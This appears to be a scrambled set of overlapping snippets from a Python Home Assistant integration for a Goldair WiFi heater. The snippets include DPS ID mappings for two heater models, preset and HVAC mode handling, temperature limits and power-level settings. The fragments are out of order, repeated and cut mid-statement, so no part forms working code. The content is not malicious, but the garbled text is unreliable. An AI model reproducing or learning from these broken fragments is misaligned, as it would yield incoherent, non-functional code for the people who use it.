ATTR_CHILD_LOCK:", "return None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and 
self.preset_mode", "| SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self, device):", "self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return the", "None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode", "of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level", "None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list", "'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of", "device (GoldairTuyaDevice): The device API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP", "polling state.\"\"\" return True @property def name(self): \"\"\"Return the name of the climate", "@property def target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\" if self.preset_mode ==", "if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property", "if not limits['min'] <= target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must", "in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level] 
self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL], dps_level) def", "def target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT:", "{ 'Stop': 'stop', '1': '1', '2': '2', '3': '3', '4': '4', '5': '5',", "mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None:", "between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif", "_LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on", "return self._device.name @property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property", "'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode'", "\"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return", "dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self):", "levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode", "if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else:", "SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max': 37", "'target_temperature' ATTR_CHILD_LOCK = 'child_lock' 
ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user'", "ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3',", "device. \"\"\" import logging import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE", "def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE:", "'5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106'", "target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self):", "heater. Args: name (str): The device's name. device (GoldairTuyaDevice): The device API instance.\"\"\"", "ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL", "the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new", "HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__)", "was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not None:", "dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else:", "'4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105',", 
"== \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list", "self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max': 37 },", "= { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT:", "ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270", "@property def preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def", "elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return", "target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode", "} HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT:", "preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode):", "ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE )", "ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE", "GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self): \"\"\"List of power levels.\"\"\" return", "= 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort'", "{ ATTR_HVAC_MODE: '1', 
ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12',", "max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max']", "'4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE", "'2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE", "heater you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property", "of supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\" return", "None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature =", "Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else:", "= SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max':", "preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in Anti-freeze mode.') limits", "have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self):", "dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of available HVAC", "} # self._model = model # _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self):", "@property def should_poll(self): \"\"\"Return the polling state.\"\"\" return True 
@property def name(self): \"\"\"Return", "Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could", "POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2': '2', '3': '3', '4': '4',", "self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not load correct", "return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self): \"\"\"Return the list of", "ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = {", "STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return", "return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE],", "HVAC mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not", "kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self,", "the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new", "TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const 
import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE,", "not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature", "== STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in Anti-freeze mode.') limits =", "logging import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate", "= { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT:", "# GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE:", "new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level] self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL],", "= list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not load correct preset mode", "list of supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\"", "{ 'min': 5, 'max': 37 }, STATE_ECO: { 'min': 5, 'max': 21 }", "we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode ==", "measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\"", "\"\"\"Initialize the heater. Args: name (str): The device's name. 
device (GoldairTuyaDevice): The device", "the name of the climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the", "self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO: { 'min':", "target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current", "= logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO =", "from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE,", "'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2': '2', '3': '3',", "SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\"", "is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self): \"\"\"Return", "self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return the supported step of target", "STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return the supported step", "GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of available", "= model # _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct", "Args: name (str): The device's name. 
device (GoldairTuyaDevice): The device API instance.\"\"\" self._device", "class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the", "from api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode", "logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto'", "STATE_ECO: { 'min': 5, 'max': 21 } } # self._model = model #", "def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current", "= 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE =", "} PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL =", "hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if", "self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\" return True @property def name(self):", "= 'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None", "@property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE:", "self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode !=", "<= target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be between '", "def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = 
PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property", "preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return", "return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode if", "None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode !=", "or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode)", "= 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL =", "'101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False,", "'5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice):", "and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set", "ValueError( f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if", "is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return", "mode from api status. 
Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}')", "@property def hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def", "mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode,", "return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode", "status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C'", "import logging import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from", "ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE =", "preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode =", "' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode", "limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}'", "== STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self):", "custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 
'child_lock' ATTR_FAULT", "{dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not None: return", "modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode]", "kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode =", "reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE])", "SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE =", "def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model of the heater", "\"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys =", "= 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze'", "model of the heater you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else:", "\"\"\" import logging import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE )", "@property def target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property", "supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum", "= PRESET_MODE_TO_DPS_MODE[preset_mode] 
self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode =", "STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO: { 'min': 5, 'max': 21", "_LOGGER.debug(f'Could not load correct preset mode from api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode", "self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def", "swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power", "json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice", "None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None:", "list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode)", "SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK", "homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate", "return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def", 
"the heater you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID", "of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if", "\"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is", "self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature})", "@property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE:", "def preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE])", "SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize", "self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode ==", "not load correct preset mode from api status. 
Defaulting to Comfort') _LOGGER.debug(f'dps_mode was:", "to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return", "get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model of the heater you", "ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE:", "and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return", "ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None", "level.\"\"\" new_level = swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level:", "ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT =", "def supported_features(self): \"\"\"Return the list of supported features.\"\"\" return self._support_flags @property def should_poll(self):", "be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature)", "of a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. 
